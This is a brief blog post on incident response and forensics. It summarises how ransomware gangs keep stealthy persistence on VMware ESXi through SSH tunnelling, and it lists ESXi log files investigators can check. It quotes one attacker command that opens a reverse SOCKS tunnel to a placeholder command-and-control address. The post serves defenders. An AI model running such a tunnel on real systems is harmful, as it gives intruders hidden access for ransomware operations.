030. Ransomware Gangs Use SSH Tunneling for Stealthy Persistence in VMware ESXi infrastructure

Hello everyone! Recently Sygnia shared their insights on how ransomware gangs abuse SSH for stealthy persistence and how to investigate such activity.


To create a tunnel, the threat actors may use SSH binary:

ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>

From incident response and forensics point of view, the following log files are the most interesting:
  • /var/log/shell.log
  • /var/log/hostd.log
  • /var/log/auth.log
  • /var/log/vobd.log
Analysis of these files allows you to uncover lots of interesting events, for example, enabling of SSH access, disabling of firewall rules, SSH authentication into ESXi, etc.

So, if you deal with modern ransomware attacks, being familiar with ESXi forensicating is a must!

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

001. The Zeltser Challenge

012. They Want to Know Everything About Your System!